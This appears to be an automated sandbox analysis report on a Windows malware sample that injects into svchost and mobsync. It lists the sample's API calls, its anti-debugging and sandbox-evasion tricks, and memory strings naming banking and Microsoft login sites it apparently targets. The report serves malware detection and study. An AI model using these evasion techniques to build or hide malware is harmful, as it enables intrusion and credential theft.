                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003CEB42
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003D123A
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeAPI/Special instruction interceptor: Address: 100A774
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: qbSIgCrCgw.exe, 00000000.00000003.1432082615.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000003.1432178200.000000000103C000.00000004.00000020.00020000.00000000.sdmp, qbSIgCrCgw.exe, 00000000.00000002.1445241515.000000000103C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
                Source: C:\Windows\SysWOW64\mobsync.exeWindow / User API: threadDelayed 9801Jump to behavior
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeEvaded block: after key decisiongraph_0-93650
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeAPI coverage: 4.2 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\mobsync.exeAPI coverage: 2.4 %
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2056Thread sleep count: 171 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2056Thread sleep time: -342000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2056Thread sleep count: 9801 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2056Thread sleep time: -19602000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe TID: 4640Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe TID: 4640Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe TID: 4640Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe TID: 4640Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_003F6CA9
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003F60DD
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003F63F9
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003FEB60
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FF56F FindFirstFileW,FindClose,0_2_003FF56F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003FF5FA
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00401B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00401B2F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00401C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00401C8A
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00401F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00401F94
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A4C560 FindFirstFileW,FindNextFileW,FindClose,6_2_02A4C560
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003CDDC0
                Source: 10O4645j.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 10O4645j.6.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 10O4645j.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 10O4645j.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 10O4645j.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 10O4645j.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 10O4645j.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 10O4645j.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 10O4645j.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 10O4645j.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 10O4645j.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: mobsync.exe, 00000006.00000002.3899096271.0000000002E29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.1966803385.000001B0C06CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
                Source: 10O4645j.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 10O4645j.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 10O4645j.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 10O4645j.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 10O4645j.6.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 10O4645j.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 10O4645j.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 10O4645j.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: WafZCahkNS.exe, 00000008.00000002.3899961087.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                Source: 10O4645j.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 10O4645j.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 10O4645j.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 10O4645j.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeAPI call chain: ExitProcess graph end nodegraph_0-93773
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417543 LdrLoadDll,2_2_00417543
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_00406AAF BlockInput,0_2_00406AAF
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_003B3D19
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003E3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_003E3920
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CE01E LoadLibraryA,GetProcAddress,0_2_003CE01E
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_01009360 mov eax, dword ptr fs:[00000030h]0_2_01009360
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0100A9E0 mov eax, dword ptr fs:[00000030h]0_2_0100A9E0
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0100AA40 mov eax, dword ptr fs:[00000030h]0_2_0100AA40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h]2_2_035B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]2_2_035B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]2_2_035FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h]2_2_035D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]2_2_035D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]2_2_0352C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]2_2_03550310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]2_2_035DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]2_2_035DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov ecx, dword ptr fs:[00000030h]2_2_035DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]2_2_035DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]2_2_035D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]2_2_035D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]2_2_035EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]2_2_035B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]2_2_035663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]2_2_0352A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]2_2_03536259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]2_2_035B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]2_2_035B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]2_2_0352826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]2_2_0352823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]2_2_035402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]2_2_035402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]2_2_035C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]2_2_0352C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]2_2_035C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]2_2_035C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]2_2_035DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]2_2_035F0115
